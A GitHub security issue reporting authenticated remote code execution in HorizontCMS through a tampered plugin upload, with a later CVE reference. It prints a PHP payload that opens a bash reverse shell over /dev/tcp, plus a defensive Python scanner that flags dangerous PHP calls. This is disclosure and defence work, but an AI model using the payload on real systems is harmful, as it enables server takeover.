ttimot24 / HorizontCMS

Lightweight CMS built on Laravel 9, VueJs 2.6 and Bootstrap 5.3. An alternative platform to OctoberCMS
MIT License

Authenticated Remote Code Execution via a Malicious Plugin Upload #29

Open bigb0sss opened 3 years ago

bigb0sss commented 3 years ago

Description of the Issue

One who is able to log into the admin panel can gain Remote Code Execution via uploading a malicious Plugin file via Plugins upload functionality.

Reproduction of the Issue

1. Login to the admin panel (http:///admin/login)
2. Prepare the malicious plugin file (We used a sample GoogleMaps (https://github.com/ttimot24/GoogleMaps) file and modified the "/resources/lang/en/message.php" to introduce our own PHP code)

```php
<?php

$shell = exec("/bin/bash -c 'bash -i >& /dev/tcp//9001 0>&1'");

return [
    'successfully_added_location' => $shell, //'Location added succesfully!',
    'successfully_deleted_location' => 'Location deleted succesfully!',
    'successfully_set_center' => 'Location is successfully set as map center!'
];
```

3. Zip the GoogleMaps plugin folder and upload it via Plugins functionality in the admin portal.
4. Install & activate the Plugins
5. Using "Add location" add an arbitrary location and click "Save" --> When its condition is met for "successfully_added_location," it will run our code ($shell) instead of printing out the original message 'Location added succesfully!'

## Screenshots
* Modifying the message.php file in the sample GoogleMaps plugin file:
![10](https://user-images.githubusercontent.com/49355913/111086742-52bdf700-84f4-11eb-9dcb-a2cecdcdbd0d.png)

* Zip and upload the GoogleMaps plugin:
```console
$ zip -r google.zip GoogleMaps
```
Root Cause

Please let us know if you have any questions or need further information. Thanks.

Daniel Min & Chi Tran
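The report shows a plugin archive whose language file calls `exec()`; a plugin is PHP by design, so the upload path cannot simply reject PHP, but an administrator can at least audit an archive before installing it. The following is an added example, not HorizontCMS code and not part of the reporters' material: it builds a constructed ZIP in memory (file paths and contents are constructed, modelled on the tampered `message.php` above) and lists every PHP line that calls a process-spawning or code-evaluating function.

```python
"""Pre-install audit of a plugin ZIP for process-spawning PHP calls.

Constructed example, not part of HorizontCMS. The archive contents below are
stand-ins modelled on the tampered resources/lang/en/message.php in the report.
"""
from __future__ import annotations

import io
import re
import zipfile

# PHP functions that hand a string to the OS or the interpreter. A hit is a
# review finding to inspect by hand, not proof of malice.
DANGEROUS_CALLS = re.compile(
    r"\b(exec|shell_exec|system|passthru|popen|proc_open|eval)\s*\(",
    re.IGNORECASE,
)

# Constructed stand-in for the modified language file (line 2 carries the call).
TAMPERED_MESSAGE_PHP = (
    "<?php\n"
    "$shell = exec('/bin/true');  // constructed stand-in for the payload\n"
    "\n"
    "return [\n"
    "    'successfully_added_location' => $shell,\n"
    "];\n"
)

# Constructed clean version of the same file: only translation strings.
CLEAN_MESSAGE_PHP = (
    "<?php\n"
    "\n"
    "return [\n"
    "    'successfully_added_location' => 'Location added successfully!',\n"
    "];\n"
)

# Constructed path; the real plugin layout may differ.
LANG_FILE = "GoogleMaps/resources/lang/en/message.php"


def build_sample_plugin(tampered: bool) -> bytes:
    """Build an in-memory plugin ZIP with a tampered or clean language file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("GoogleMaps/README.md", "# constructed sample plugin\n")
        zf.writestr(LANG_FILE, TAMPERED_MESSAGE_PHP if tampered else CLEAN_MESSAGE_PHP)
    return buf.getvalue()


def scan_plugin_zip(data: bytes) -> list[tuple[str, int, str]]:
    """Return (path, line_no, function) for every suspicious line in PHP files."""
    findings: list[tuple[str, int, str]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(".php"):
                continue
            source = zf.read(info).decode("utf-8", errors="replace")
            for line_no, line in enumerate(source.splitlines(), start=1):
                match = DANGEROUS_CALLS.search(line)
                if match:
                    findings.append((info.filename, line_no, match.group(1).lower()))
    return findings


if __name__ == "__main__":
    for path, line_no, func in scan_plugin_zip(build_sample_plugin(tampered=True)):
        print(f"{path}:{line_no}: call to {func}()")
```

A scan like this only narrows review to the lines worth reading; it does not make plugin upload safe, because any PHP a plugin ships runs with the application's privileges. The effective controls are limiting who can reach the plugin upload and treating that admin role as equivalent to code execution on the host.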

bigb0sss commented 3 years ago

Hi @ttimot24,

Hope all is well. Thank you for labeling the issues as security. We are wondering if you are planning to remediate the issues any time soon. If not, would it be okay for us to write a short blog about our findings on the HorizontCMS? Thanks.

ttimot24 commented 3 years ago

Hi @bigb0sss,

I'm planning to fix this security issue. My schedule is a bit busy, so I think it will be fixed in April.

Feel free to write about it on your blog.

bigb0sss commented 3 years ago

Hi @ttimot24,

Hope all is well.

We know you are still busy, but we just wanted to follow up again to see if the issues have been fixed?

If so, would you please point us to the updated code?

Please let us know if you have any questions. Thanks!

bigb0sss commented 2 years ago

Hi @ttimot24,

Hope all is well. CVE-2021-28428 (https://www.cve.org/CVERecord?id=CVE-2021-28428) was assigned for this issue. Thanks again for the prompt fix for the vulnerability.

All the best,